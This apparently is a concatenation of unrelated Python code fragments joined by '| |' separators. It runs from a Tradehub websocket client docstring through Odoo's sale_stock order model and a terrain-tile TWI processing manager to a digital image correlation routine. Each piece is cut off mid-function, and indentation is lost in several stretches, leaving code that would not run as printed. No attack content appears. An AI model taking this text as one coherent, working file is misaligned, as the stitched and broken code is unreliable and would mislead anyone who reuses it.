:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param market: Tradehub market identifier, e.g. 'swth_eth1'
:return: None
"""
channel_name: str = f"recent_trades.{market}"
await self.subscribe(message_id, [channel_name])
async def subscribe_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None):
"""
Subscribe to account trades.
Example::
ws_client.subscribe_account_trades('account', 'swth...abcd', 'eth1_usdc1')
# or for all markets
ws_client.subscribe_account_trades('account', "swth...abcd')
The initial channel message is expected as::
{
'id': 'account',
'result': ['account_trades_by_market.eth1_usdc1.swth1...abcd']
}
# or for all markets
{
'id': 'account',
'result': ['account_trades.swth1...abcd']
}
The channel update messages are expected as::
{
'channel': 'recent_trades.eth1_usdc1',
'sequence_number': 812,
'result': [
{
'id': '0',
'block_created_at': '2021-02-11T20:49:07.095418551Z',
'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856',
'taker_address': 'swth1...taker',
'taker_fee_amount': '0.00002',
'taker_fee_denom': 'eth1',
'taker_side': 'buy',
'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E',
'maker_address': 'swth1...maker',
'maker_fee_amount': '-0.00001',
'maker_fee_denom': 'eth1',
'maker_side': 'sell',
'market': 'eth1_usdc1',
'price': '1797.1',
'quantity': '0.02',
'liquidation': '',
'taker_username': '',
'maker_username': '',
'block_height': '7376096'
},
...
]
}
.. note::
The market identifier is optional and acts as a filter.
.. warning::
The field 'id' is '0' all the time. This endpoint/channel does not seem to work correct.
:param message_id: Identifier that will be included in the websocket message response to allow the subscriber to
identify which channel the notification is originated from.
:param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet.
:param market: Tradehub market identifier, | |
<gh_stars>0
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from odoo import api, fields, models, _
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
from odoo.tools.float_utils import float_repr
from odoo.tools.misc import format_date
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class SaleOrder(models.Model):
    """Extend sale.order with stock integration: warehouse selection,
    delivery pickings, effective/expected dates and decrease-quantity
    exception logging on the related transfers."""
    _inherit = "sale.order"
    @api.model
    def _default_warehouse_id(self):
        # !!! Any change to the default value may have to be repercuted
        # on _init_column() below.
        return self.env.user._get_default_warehouse_id()
    incoterm = fields.Many2one(
        'account.incoterms', 'Incoterm',
        help="International Commercial Terms are a series of predefined commercial terms used in international transactions.")
    picking_policy = fields.Selection([
        ('direct', 'As soon as possible'),
        ('one', 'When all products are ready')],
        string='Shipping Policy', required=True, readonly=True, default='direct',
        states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}
        ,help="If you deliver all products at once, the delivery order will be scheduled based on the greatest "
        "product lead time. Otherwise, it will be based on the shortest.")
    warehouse_id = fields.Many2one(
        'stock.warehouse', string='Warehouse',
        required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
        default=_default_warehouse_id, check_company=True)
    picking_ids = fields.One2many('stock.picking', 'sale_id', string='Transfers')
    delivery_count = fields.Integer(string='Delivery Orders', compute='_compute_picking_ids')
    procurement_group_id = fields.Many2one('procurement.group', 'Procurement Group', copy=False)
    effective_date = fields.Date("Effective Date", compute='_compute_effective_date', store=True, help="Completion date of the first delivery order.")
    expected_date = fields.Datetime( help="Delivery date you can promise to the customer, computed from the minimum lead time of "
                                          "the order lines in case of Service products. In case of shipping, the shipping policy of "
                                          "the order will be taken into account to either use the minimum or maximum lead time of "
                                          "the order lines.")
    json_popover = fields.Char('JSON data for the popover widget', compute='_compute_json_popover')
    show_json_popover = fields.Boolean('Has late picking', compute='_compute_json_popover')
    def _init_column(self, column_name):
        """ Ensure the default warehouse_id is correctly assigned
            At column initialization, the ir.model.fields for res.users.property_warehouse_id isn't created,
            which means trying to read the property field to get the default value will crash.
            We therefore enforce the default here, without going through
            the default function on the warehouse_id field.
        """
        if column_name != "warehouse_id":
            return super(SaleOrder, self)._init_column(column_name)
        field = self._fields[column_name]
        # First warehouse of the current company, same fallback the user
        # default would resolve to.
        default = self.env['stock.warehouse'].search([('company_id', '=', self.env.company.id)], limit=1)
        value = field.convert_to_write(default, self)
        value = field.convert_to_column(value, self)
        if value is not None:
            _logger.debug("Table '%s': setting default value of new column %s to %r",
                          self._table, column_name, value)
            query = 'UPDATE "%s" SET "%s"=%s WHERE "%s" IS NULL' % (
                self._table, column_name, field.column_format, column_name)
            self._cr.execute(query, (value,))
    @api.depends('picking_ids.date_done')
    def _compute_effective_date(self):
        """Effective date = date of the first customer delivery marked done."""
        for order in self:
            pickings = order.picking_ids.filtered(lambda x: x.state == 'done' and x.location_dest_id.usage == 'customer')
            dates_list = [date for date in pickings.mapped('date_done') if date]
            order.effective_date = min(dates_list).date() if dates_list else False
    @api.depends('picking_policy')
    def _compute_expected_date(self):
        """Extend the base computation: with 'direct' shipping policy use the
        earliest line date, otherwise ('one') the latest."""
        super(SaleOrder, self)._compute_expected_date()
        for order in self:
            dates_list = []
            # Delivery-cost lines and section/note lines don't constrain the date.
            for line in order.order_line.filtered(lambda x: x.state != 'cancel' and not x._is_delivery() and not x.display_type):
                dt = line._expected_date()
                dates_list.append(dt)
            if dates_list:
                expected_date = min(dates_list) if order.picking_policy == 'direct' else max(dates_list)
                order.expected_date = fields.Datetime.to_string(expected_date)
    @api.model
    def create(self, vals):
        """Derive the warehouse from the salesperson's company-specific
        default when a company is given but no warehouse."""
        if 'warehouse_id' not in vals and 'company_id' in vals:
            user = self.env['res.users'].browse(vals.get('user_id', False))
            vals['warehouse_id'] = user.with_company(vals.get('company_id'))._get_default_warehouse_id().id
        return super().create(vals)
    def write(self, values):
        """Log activities on pickings when the shipping address changes or
        ordered quantities decrease, and propagate a new commitment date to
        the related stock moves."""
        if values.get('order_line') and self.state == 'sale':
            # NOTE(review): pre_order_line_qty is rebound on each loop pass, so
            # with a multi-record `self` only the last order's snapshot survives
            # for the comparison below — confirm against upstream before relying
            # on multi-order writes here.
            for order in self:
                pre_order_line_qty = {order_line: order_line.product_uom_qty for order_line in order.mapped('order_line') if not order_line.is_expense}
        if values.get('partner_shipping_id'):
            new_partner = self.env['res.partner'].browse(values.get('partner_shipping_id'))
            for record in self:
                picking = record.mapped('picking_ids').filtered(lambda x: x.state not in ('done', 'cancel'))
                addresses = (record.partner_shipping_id.display_name, new_partner.display_name)
                message = _("""The delivery address has been changed on the Sales Order<br/>
                        From <strong>"%s"</strong> To <strong>"%s"</strong>,
                        You should probably update the partner on this document.""") % addresses
                picking.activity_schedule('mail.mail_activity_data_warning', note=message, user_id=self.env.user.id)
        if values.get('commitment_date'):
            # propagate commitment_date as the deadline of the related stock move.
            # TODO: Log a note on each down document
            self.order_line.move_ids.date_deadline = fields.Datetime.to_datetime(values.get('commitment_date'))
        res = super(SaleOrder, self).write(values)
        if values.get('order_line') and self.state == 'sale':
            for order in self:
                to_log = {}
                for order_line in order.order_line:
                    if float_compare(order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0), order_line.product_uom.rounding) < 0:
                        to_log[order_line] = (order_line.product_uom_qty, pre_order_line_qty.get(order_line, 0.0))
                if to_log:
                    documents = self.env['stock.picking']._log_activity_get_documents(to_log, 'move_ids', 'UP')
                    documents = {k:v for k, v in documents.items() if k[0].state != 'cancel'}
                    order._log_decrease_ordered_quantity(documents)
        return res
    def _compute_json_popover(self):
        """Feed the delay-alert popover widget with the late pickings."""
        for order in self:
            late_stock_picking = order.picking_ids.filtered(lambda p: p.delay_alert_date)
            order.json_popover = json.dumps({
                'popoverTemplate': 'sale_stock.DelayAlertWidget',
                'late_elements': [{
                        'id': late_move.id,
                        'name': late_move.display_name,
                        'model': 'stock.picking',
                    } for late_move in late_stock_picking
                ]
            })
            order.show_json_popover = bool(late_stock_picking)
    def _action_confirm(self):
        # Launch procurement/stock rules for the lines before confirming.
        self.order_line._action_launch_stock_rule()
        return super(SaleOrder, self)._action_confirm()
    @api.depends('picking_ids')
    def _compute_picking_ids(self):
        for order in self:
            order.delivery_count = len(order.picking_ids)
    @api.onchange('company_id')
    def _onchange_company_id(self):
        """Re-align the warehouse with the new company, preferring an
        explicit ir.default over the user's default warehouse."""
        if self.company_id:
            warehouse_id = self.env['ir.default'].get_model_defaults('sale.order').get('warehouse_id')
            self.warehouse_id = warehouse_id or self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id
    @api.onchange('user_id')
    def onchange_user_id(self):
        super().onchange_user_id()
        self.warehouse_id = self.user_id.with_company(self.company_id.id)._get_default_warehouse_id().id
    @api.onchange('partner_shipping_id')
    def _onchange_partner_shipping_id(self):
        """Warn when open pickings still reference the previous address."""
        res = {}
        pickings = self.picking_ids.filtered(
            lambda p: p.state not in ['done', 'cancel'] and p.partner_id != self.partner_shipping_id
        )
        if pickings:
            res['warning'] = {
                'title': _('Warning!'),
                'message': _(
                    'Do not forget to change the partner on the following delivery orders: %s'
                ) % (','.join(pickings.mapped('name')))
            }
        return res
    def action_view_delivery(self):
        '''
        This function returns an action that displays existing delivery orders
        of given sales order ids. It can either be in a list or in a form
        view, if there is only one delivery order to show.
        '''
        action = self.env["ir.actions.actions"]._for_xml_id("stock.action_picking_tree_all")
        pickings = self.mapped('picking_ids')
        if len(pickings) > 1:
            action['domain'] = [('id', 'in', pickings.ids)]
        elif pickings:
            form_view = [(self.env.ref('stock.view_picking_form').id, 'form')]
            if 'views' in action:
                action['views'] = form_view + [(state,view) for state,view in action['views'] if view != 'form']
            else:
                action['views'] = form_view
            action['res_id'] = pickings.id
        # Prepare the context.
        # Prefer an outgoing picking for the defaults, fall back to the first one.
        picking_id = pickings.filtered(lambda l: l.picking_type_id.code == 'outgoing')
        if picking_id:
            picking_id = picking_id[0]
        else:
            picking_id = pickings[0]
        action['context'] = dict(self._context, default_partner_id=self.partner_id.id, default_picking_type_id=picking_id.picking_type_id.id, default_origin=self.name, default_group_id=picking_id.group_id.id)
        return action
    def action_cancel(self):
        """Cancel the related pickings, logging a decrease-to-zero exception
        for confirmed orders, then delegate to the base cancellation."""
        documents = None
        for sale_order in self:
            if sale_order.state == 'sale' and sale_order.order_line:
                # Treat cancellation as every line dropping to quantity 0.
                sale_order_lines_quantities = {order_line: (order_line.product_uom_qty, 0) for order_line in sale_order.order_line}
                documents = self.env['stock.picking']._log_activity_get_documents(sale_order_lines_quantities, 'move_ids', 'UP')
        self.picking_ids.filtered(lambda p: p.state != 'done').action_cancel()
        if documents:
            filtered_documents = {}
            for (parent, responsible), rendering_context in documents.items():
                if parent._name == 'stock.picking':
                    if parent.state == 'cancel':
                        continue
                filtered_documents[(parent, responsible)] = rendering_context
            self._log_decrease_ordered_quantity(filtered_documents, cancel=True)
        return super(SaleOrder, self).action_cancel()
    def _prepare_invoice(self):
        # Carry the order's incoterm over to the customer invoice.
        invoice_vals = super(SaleOrder, self)._prepare_invoice()
        invoice_vals['invoice_incoterm_id'] = self.incoterm.id
        return invoice_vals
    @api.model
    def _get_customer_lead(self, product_tmpl_id):
        # Override: the lead time comes from the product's sale_delay.
        super(SaleOrder, self)._get_customer_lead(product_tmpl_id)
        return product_tmpl_id.sale_delay
    def _log_decrease_ordered_quantity(self, documents, cancel=False):
        """Post the 'exception_on_so' activity on the impacted pickings for
        the given decrease documents; ``cancel`` switches the wording."""
        def _render_note_exception_quantity_so(rendering_context):
            # Rebuild recordsets from the raw rendering context before rendering
            # the QWeb exception template.
            order_exceptions, visited_moves = rendering_context
            visited_moves = list(visited_moves)
            visited_moves = self.env[visited_moves[0]._name].concat(*visited_moves)
            order_line_ids = self.env['sale.order.line'].browse([order_line.id for order in order_exceptions.values() for order_line in order[0]])
            sale_order_ids = order_line_ids.mapped('order_id')
            impacted_pickings = visited_moves.filtered(lambda m: m.state not in ('done', 'cancel')).mapped('picking_id')
            values = {
                'sale_order_ids': sale_order_ids,
                'order_exceptions': order_exceptions.values(),
                'impacted_pickings': impacted_pickings,
                'cancel': cancel
            }
            return self.env.ref('sale_stock.exception_on_so')._render(values=values)
        self.env['stock.picking']._log_activity(_render_note_exception_quantity_so, documents)
    def _show_cancel_wizard(self):
        """Force the cancel wizard whenever a delivery is already done,
        unless explicitly disabled through the context."""
        res = super(SaleOrder, self)._show_cancel_wizard()
        for order in self:
            if any(picking.state == 'done' for picking in order.picking_ids) and not order._context.get('disable_cancel_warning'):
                return True
        return res
class SaleOrderLine(models.Model):
    _inherit = 'sale.order.line'
    # 'stock_move' makes qty_delivered follow the related stock moves.
    qty_delivered_method = fields.Selection(selection_add=[('stock_move', 'Stock Moves')])
    product_packaging = fields.Many2one( 'product.packaging', string='Package', default=False, check_company=True)
    route_id = fields.Many2one('stock.location.route', string='Route', domain=[('sale_selectable', '=', True)], ondelete='restrict', check_company=True)
    move_ids = fields.One2many('stock.move', 'sale_line_id', string='Stock Moves')
    product_type = fields.Selection(related='product_id.type')
    # Availability/forecast figures feeding the line's inventory widget,
    # all computed together in _compute_qty_at_date.
    virtual_available_at_date = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure')
    scheduled_date = fields.Datetime(compute='_compute_qty_at_date')
    forecast_expected_date = fields.Datetime(compute='_compute_qty_at_date')
    free_qty_today = fields.Float(compute='_compute_qty_at_date', digits='Product Unit of Measure')
    qty_available_today = fields.Float(compute='_compute_qty_at_date')
    warehouse_id = fields.Many2one(related='order_id.warehouse_id')
    qty_to_deliver = fields.Float(compute='_compute_qty_to_deliver', digits='Product Unit of Measure')
    is_mto = fields.Boolean(compute='_compute_is_mto')
    # Whether the inventory widget is shown; see _compute_qty_to_deliver.
    display_qty_widget = fields.Boolean(compute='_compute_qty_to_deliver')
@api.depends('product_type', 'product_uom_qty', 'qty_delivered', 'state', 'move_ids', 'product_uom')
def _compute_qty_to_deliver(self):
"""Compute the visibility of the inventory widget."""
for line in self:
line.qty_to_deliver = line.product_uom_qty - line.qty_delivered
if line.state in ('draft', 'sent', 'sale') and line.product_type == 'product' and line.product_uom and line.qty_to_deliver > 0:
if line.state == 'sale' and not line.move_ids:
line.display_qty_widget = False
else:
line.display_qty_widget = True
else:
line.display_qty_widget = False
@api.depends(
'product_id', 'customer_lead', 'product_uom_qty', 'product_uom', 'order_id.commitment_date',
'move_ids', 'move_ids.forecast_expected_date', 'move_ids.forecast_availability')
def _compute_qty_at_date(self):
""" Compute the quantity forecasted of product at delivery date. There are
two cases:
1. The quotation has a commitment_date, we take it as delivery date
2. The quotation hasn't commitment_date, we compute the estimated delivery
date based on lead time"""
treated = self.browse()
# If the state is already in sale the picking is created and a simple forecasted quantity isn't enough
# Then used the forecasted data of the related stock.move
for line in self.filtered(lambda l: l.state == 'sale'):
if not line.display_qty_widget:
continue
moves = line.move_ids.filtered(lambda m: m.product_id == line.product_id)
line.forecast_expected_date = max(moves.filtered("forecast_expected_date").mapped("forecast_expected_date"), default=False)
line.qty_available_today = 0
line.free_qty_today = 0
for move in moves:
line.qty_available_today += move.product_uom._compute_quantity(move.reserved_availability, line.product_uom)
| |
{'left': EdgeFile(fn, [slice(None), slice(0, 1)], save_path),
'right': EdgeFile(fn, [slice(None), slice(-1, None)], save_path),
'top': EdgeFile(fn, [slice(0, 1), slice(None)], save_path),
'bottom': EdgeFile(fn, [slice(-1, None), slice(None)], save_path)}
for fn in list(self.neighbors.keys())}
self.edges = edges
return edges
def fill_max_elevations(self):
max_elev = {}
for fn in list(self.edges.keys()):
elev_file = GdalReader(file_name=fn)
elev, = elev_file.raster_layers
max_elev[fn] = np.nanmax(elev.raster_data)
del elev_file # close file
del elev
self.max_elev = max_elev
def fill_percent_done(self):
percent_done = {}
for key, edge in self.edges.items():
for key1, ed in edge.items():
ed.update_metrics()
# ed.load_metrics()
percent_done[key] = np.array([edge[key2].percent_done
for key2 in list(edge.keys())])
percent_done[key] = percent_done[key].sum() \
/ ((percent_done[key] > 0).sum() + 1e-16)
self.percent_done = percent_done
    def visualize_neighbors(self, neighbors=None):
        """Plot the tile layout, neighbor links and per-edge completion status.

        Draws one square per tile colored by its percent-done, quiver arrows
        pointing at each neighbor, and per-edge markers distinguishing
        done / could-do / blocked edge pixels.

        :param neighbors: Mapping of tile filename -> side -> neighbor
            filename; defaults to ``self.neighbors``.
        """
        if neighbors is None:
            neighbors = self.neighbors
        import matplotlib.pyplot as plt
        # Tile bounding boxes parsed from the filenames.
        coords = np.array([parse_fn(key) for key in list(neighbors.keys())])
        n_coords = [np.array([parse_fn(neighbors[key][side])
                              for key in list(neighbors.keys())])
                    for side in ['left', 'right', 'top', 'bottom',
                                 'top-right', 'top-left', 'bottom-right', 'bottom-left']]
        # Column indices of the parsed bounding box: [bottom, left, top, right].
        top = 2
        bot = 0
        left = 1
        right = 3
        # Tile centers, and arrow offsets toward each neighbor's center.
        x = (coords[:, left] + coords[:, right]) / 2.0
        y = (coords[:, top] + coords[:, bot]) / 2.0
        n_x = [(n_coord[:, left] + n_coord[:, right]) / 2.0 - x
               for n_coord in n_coords]
        n_y = [(n_coord[:, top] + n_coord[:, bot]) / 2.0 - y
               for n_coord in n_coords]
        self.fill_percent_done()
        colors = np.array([self.percent_done[key] for key in list(neighbors.keys())])
        plt.scatter(x, y, c=colors, s=400, cmap='CMRmap_r')
        plt.clim(0, 100)
        plt.colorbar()
        for coord in coords:
            plt.plot([coord[left], coord[right], coord[right],
                      coord[left], coord[left]],
                     [coord[top], coord[top], coord[bot],
                      coord[bot], coord[top]])
        for nx, ny in zip(n_x, n_y):
            plt.quiver(x, y, nx, ny, angles='xy', scale_units='xy',
                       scale=1, width=0.005)
        plt.xlim(coords[:, left].min(), coords[:, right].max())
        plt.ylim(coords[:, bot].min(), coords[:, top].max())
        # Per-edge status markers; note x/y are rebound to edge pixel
        # coordinates from here on.
        count = 0
        for key, edge in self.edges.items():
            for side in ['left', 'right', 'top', 'bottom']:
                ed = edge[side]
                coordinates = ed.get_coordinates()
                todo = ed.get('todo')
                done = ed.get('done')
                data = (ed.get('data') > 0)
                y, x = coordinates.T
                if side in ['left', 'top']:
                    plt.plot(x[todo & done & data], y[todo & done & data],
                             'bo', mec='b', mfc='none', mew=1,
                             label='could do (left/top)')
                    plt.plot(x[todo & ~done], y[todo & ~done], 'xr',
                             label='not done, could not do (left/top)')
                    plt.plot(x[~todo & done], y[~todo & done], '<g', mec='g',
                             label='done (left/top)')
                else:
                    plt.plot(x[todo & done & data], y[todo & done & data],
                             'bs', mec='b', mfc='none', mew=1,
                             label='could do (right/bot)')
                    plt.plot(x[todo & ~done], y[todo & ~done], '+r',
                             label='not done, could not do (right/bot)')
                    plt.plot(x[~todo & done], y[~todo & done], '>g', mec='g',
                             label='done (right/bot)')
                # Draw legend entries only once, for the first edge.
                if count == 0:
                    plt.plot(x[0], y[0], 'bs', mec='b', mfc='none', mew=1,
                             label='could do (right/bot)')
                    plt.plot(x[0], y[0], '+r',
                             label='not done, could not do (right/bot)')
                    plt.plot(x[0], y[0], '>g', mec='g',
                             label='done (right/bot)')
                    plt.legend(loc=0)
                count += 1
        # clean up
        del coordinates
        del todo
        del done
        del data
def build_interpolator(self, dem_proc):
# Build an interpolator
gc = dem_proc.elev.grid_coordinates
# points = np.meshgrid(gc.x_axis, gc.y_axis)
# points = np.column_stack([pts.ravel() for pts in points])
# interp = spinterp.NearestNDInterpolator(points, dem_proc.data.ravel())
# interp = spinterp.LinearNDInterpolator(points, np.ravel(dem_proc.data),
# fill_value=np.nan)
interp = spinterp.interpolate.RegularGridInterpolator(
points=(gc.y_axis[::-1], gc.x_axis),
values=dem_proc.data[::-1, :].astype(float),
method='nearest', fill_value=np.nan, bounds_error=False)
return interp
    def set_neighbor_data(self, elev_fn, dem_proc, interp=None):
        """
        Push this tile's results onto the matching edges of its neighbors.

        For every neighbor of ``elev_fn``, the neighbor's opposite edge
        (our 'top' feeds their 'bottom', our 'left' their 'right', and
        diagonal keys feed both component edges) is filled with this tile's
        'uca' data and 'done' flags, sampled through ``interp``.

        :param elev_fn: Filename of the tile whose results are being shared.
        :param dem_proc: Processed DEM providing ``uca`` and ``edge_done``.
        :param interp: Optional pre-built interpolator; built on demand.
        """
        if interp is None:
            interp = self.build_interpolator(dem_proc)
        opp = {'top': 'bottom', 'left': 'right'}
        for key in list(self.neighbors[elev_fn].keys()):
            tile = self.neighbors[elev_fn][key]
            if tile == '':
                continue
            # Flip each side name to its opposite; replace() handles
            # compound keys like 'top-left' -> 'bottom-right'.
            oppkey = key
            for me, neigh in opp.items():
                if me in key:
                    oppkey = oppkey.replace(me, neigh)
                else:
                    oppkey = oppkey.replace(neigh, me)
            opp_edge = self.neighbors[tile][oppkey]
            if opp_edge == '':
                continue
            # Rows reversed to match the interpolator's ascending y-axis.
            interp.values = dem_proc.uca[::-1, :]
            # interp.values[:, 0] = np.ravel(dem_proc.uca) # for other interp.
            # for the top-left tile we have to set the bottom and right edges
            # of that tile, so two edges for those tiles
            for key_ed in oppkey.split('-'):
                self.edges[tile][key_ed].set_data('data', interp)
            interp.values = dem_proc.edge_done[::-1, :].astype(float)
            # interp.values[:, 0] = np.ravel(dem_proc.edge_done)
            for key_ed in oppkey.split('-'):
                self.edges[tile][key_ed].set_data('done', interp)
def update_edge_todo(self, elev_fn, dem_proc):
"""
Can figure out how to update the todo based on the elev filename
"""
for key in list(self.edges[elev_fn].keys()):
self.edges[elev_fn][key].set_data('todo', data=dem_proc.edge_todo)
    def update_edges(self, elev_fn, dem_proc):
        """
        After finishing a calculation, this will update the neighbors and the
        todo for that tile.

        The tile's own todo flags are refreshed first, then its data/done
        edges are pushed to the neighboring tiles through one shared
        interpolator.
        """
        interp = self.build_interpolator(dem_proc)
        self.update_edge_todo(elev_fn, dem_proc)
        self.set_neighbor_data(elev_fn, dem_proc, interp)
def get_edge_init_data(self, fn, save_path=None):
    """Collect initialization values from the edge structure for tile ``fn``.

    Parameters
    ----------
    fn : str
        Tile filename whose edges are queried.
    save_path : str, optional
        Unused here; kept for interface compatibility.

    Returns
    -------
    tuple of dict
        ``(data, done, todo)`` dictionaries keyed by edge name.
    """
    tile_edges = self.edges[fn]
    data, done, todo = (
        {name: edge.get(field) for name, edge in tile_edges.items()}
        for field in ('data', 'done', 'todo'))
    return data, done, todo
def find_best_candidate(self, elev_source_files=None):
    """
    Heuristically determines which tile should be recalculated based on
    updated edge information. Presently does not check if that tile is
    locked, which could lead to a parallel thread closing while one thread
    continues to process tiles.

    Parameters
    ----------
    elev_source_files : list of str, optional
        When given, the return value is the index of the chosen tile in
        this list, and lock files are checked to avoid tiles another
        process is working on.

    Returns
    -------
    int or None
        Index of the best candidate tile, or ``None`` when no tile has a
        positive percent-done score.
    """
    self.fill_percent_done()
    i_b = np.argmax(list(self.percent_done.values()))
    if list(self.percent_done.values())[i_b] <= 0:
        return None

    # check for ties
    I = np.array(list(self.percent_done.values())) == \
        list(self.percent_done.values())[i_b]
    if I.sum() == 1:
        pass  # no ties
    else:
        # Break ties by choosing the tile with the largest maximum elevation.
        I2 = np.argmax(np.array(list(self.max_elev.values()))[I])
        i_b = I.nonzero()[0][I2]
        # Make sure the apples are still apples
        # (percent_done and max_elev must be keyed/ordered identically).
        assert(np.array(list(self.max_elev.keys()))[I][I2]
               == np.array(list(self.percent_done.keys()))[I][I2])

    if elev_source_files is not None:
        fn = list(self.percent_done.keys())[i_b]
        lckfn = _get_lockfile_name(fn)
        if os.path.exists(lckfn):  # another process is working on it
            # Find a different Candidate
            i_alt = np.argsort(list(self.percent_done.values()))[::-1]
            for i in i_alt:
                fn = list(self.percent_done.keys())[i]
                lckfn = _get_lockfile_name(fn)
                if not os.path.exists(lckfn):
                    break
        # Get and return the index
        i_b = elev_source_files.index(fn)
    return i_b
class ProcessManager(object):
"""
This assumes that the elevation has already been processed. That is,
pits have been removed.
"""
twi_status = []
elev_source_files = []
_INPUT_FILE_TYPES = ["tif", "tiff", "vrt", "hgt", 'flt', 'adf', 'grib',
'grib2', 'grb', 'gr1']
tile_edge = None
_DEBUG = False
def __init__(self, source_path='.', save_path='processed_data',
             clean_tmp=True, use_cache=True, overwrite_cache=False):
    """
    Processes elevation data inputs, and saves conditioned elevation and
    the topographic wetness index.

    Parameters
    -----------
    source_path: list/str (optional)
        Default: current directory. Directory/location of elevation files.
    save_path: str (optional)
        Location where processed files will be saved. Default value is a
        sub-directory to the source file path called 'processed_data'.
    clean_tmp: bool (optional)
        Default: True. When True, some temporary files and directories are
        removed after calculation. If False, these are not removed.
    use_cache: bool (optional)
        Default: True. When True, this function looks in the expected
        temporary file location and uses any intermediate files already
        present
    overwrite_cache: bool (optional)
        Default: False. If this file already exists, it is not overwritten,
        and no calculation is made. If True, any exisiting file will be
        replaced
    """
    self.source_path = source_path
    self.save_path = save_path
    self.overwrite_cache = overwrite_cache
    self.clean_tmp = clean_tmp
    # NOTE(review): use_cache is accepted but not stored here -- presumably
    # consumed elsewhere; confirm before changing the signature.
    # Collect every file in source_path whose extension (sans dot) is a
    # recognized elevation input format.
    self.elev_source_files = [os.path.join(source_path, fn)
                              for fn in os.listdir(source_path)
                              if os.path.splitext(fn)[-1].replace('.', '')
                              in self._INPUT_FILE_TYPES]
    self.twi_status = ["Unknown" for sf in self.elev_source_files]
    self.custom_status = ["Unknown" for sf in self.elev_source_files]
    # Create the output directory tree (one sub-directory per product).
    if not os.path.isdir(save_path):
        os.makedirs(save_path)
    subdirs = ['ang', 'mag', 'uca', 'twi', 'uca_edge_corrected', 'edge']
    for subdir in subdirs:
        if not os.path.isdir(os.path.join(save_path, subdir)):
            os.makedirs(os.path.join(save_path, subdir))
def process_twi(self, index=None, do_edges=False, skip_uca_twi=False):
    """
    Processes the TWI, along with any dependencies (like the slope and UCA)

    Parameters
    -----------
    index : int/slice (optional)
        Default: None - process all tiles in source directory. Otherwise,
        will only process the index/indices of the files as listed in
        self.elev_source_files
    do_edges : bool (optional)
        Default False. When false, the UCA will be calculated with
        available edge information if the UCA was not previously computed.
        If the UCA was previously computed and do_edges == False, the UCA
        will not be updated. If do_edges == True, the UCA will also be
        recalculated.
    skip_uca_twi : bool (optional)
        Skips the calculation of the UCA and TWI (only calculates the
        magnitude and direction)

    Notes
    ------
    do_edges = False for the first round of the processing, but it is True
    for the second round.
    """
    if index is not None:
        elev_source_files = [self.elev_source_files[index]]
    else:
        elev_source_files = self.elev_source_files
    for i, esfile in enumerate(elev_source_files):
        try:
            fn, status = self.calculate_twi(esfile,
                                            save_path=self.save_path,
                                            do_edges=do_edges,
                                            skip_uca_twi=skip_uca_twi)
            if index is None:
                self.twi_status[i] = status
            else:
                self.twi_status[index] = status
        except Exception:
            # Was a bare `except:`; narrowed so KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            # Best effort: release this tile's lock file so another
            # process can pick it up.
            lckfn = _get_lockfile_name(esfile)
            try:
                os.remove(lckfn)
            except OSError:
                pass  # lock file never existed or already removed
            traceback.print_exc()
            print(traceback.format_exc())
            if index is None:
                self.twi_status[i] = "Error " + traceback.format_exc()
            else:
                self.twi_status[index] = "Error " + traceback.format_exc()
def process(self, index=None):
"""
This will completely process a directory of elevation tiles (as
supplied in the constructor). Both phases of the calculation, the
single tile | |
from __future__ import absolute_import
import logging
from copy import copy
import numpy as np
import scipy.ndimage as nd
from .reference import generate_reference
from .reference_q4 import generate_reference_Q4, find_elm_borders_mesh, normalized_zero_mean
from ..IO.image_stack import ImageStack
from ..elements.b_splines import BSplineSurface
from ..elements.q4 import Q4
from ..mesh.meshUtilities import Mesh
from ..utils import convert_to_img_frame, find_element_borders
def correlate_img_to_ref_spline(node_pos, img, ref, settings):
    """
    Correlate an image to a reference

    The routine identifies the part of the image covered by the mesh and
    tries to perform image correlation on this part of the image.

    Parameters
    ----------
    node_pos : ndarray
        The position of the nodes
    img : ndarray
        2d array containing the image
    ref : Reference
        The reference object
    settings : DICInput
        The settings which will be used during the analysis; the mesh is
        taken from ``settings.mesh``.

    Returns
    -------
    node_position_new, Ic, conv
        Updated node positions, current pixel values and a convergence
        flag.

    NOTES
    -------
    The function extracts a rectangular region of the image covered by the element, which may be very large
    if the mesh is tilted. This would reduce the performance of the routine
    """
    # Bounding box of the mesh elements in image coordinates.
    element_borders = find_element_borders(node_pos, settings.mesh)
    # Crop the image to that region and express node positions in its frame.
    image_frame, node_pos_img_coords = convert_to_img_frame(img, node_pos, settings.mesh, element_borders, settings)
    # Iterative correlation returns an increment relative to node_pos.
    node_position_increment, Ic, conv = correlate_frames(node_pos_img_coords, settings.mesh, image_frame, ref, settings)
    node_position_new = node_pos + node_position_increment
    return node_position_new, Ic, conv
def correlate_frames(node_pos, mesh, img, ref, settings):
"""
Parameters
----------
node_pos : ndarray
The position of the nodes
mesh : Mesh
The mesh object
img : ndarray
2d array containing the image frame
ref : Reference
The reference object
settings : DICInput
The settings which will be used during the analysis
Returns
-------
updated node positions, current pixel values
"""
logger = logging.getLogger(__name__)
node_pos = np.copy(node_pos).astype(settings.precision)
# Declare empty arrays
pixel_pos = np.zeros((2, ref.n_pixels), dtype=settings.precision)
dnod_x = np.zeros(mesh.n_nodes * 2)
image_filtered = nd.spline_filter(img, order=settings.interpolation_order).transpose()
for it in range(settings.maxit):
# Find nodal positions within ROI
np.dot(node_pos, ref.Nref_stack, out=pixel_pos)
# Find pixel values for current coordinates
Ic = nd.map_coordinates(image_filtered, pixel_pos, order=settings.interpolation_order, prefilter=False)
# Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution"
dnod = np.dot(ref.K, ref.I0_stack - Ic)
# Add increment to nodal positions
node_pos[0, :] += dnod[:mesh.n_nodes]
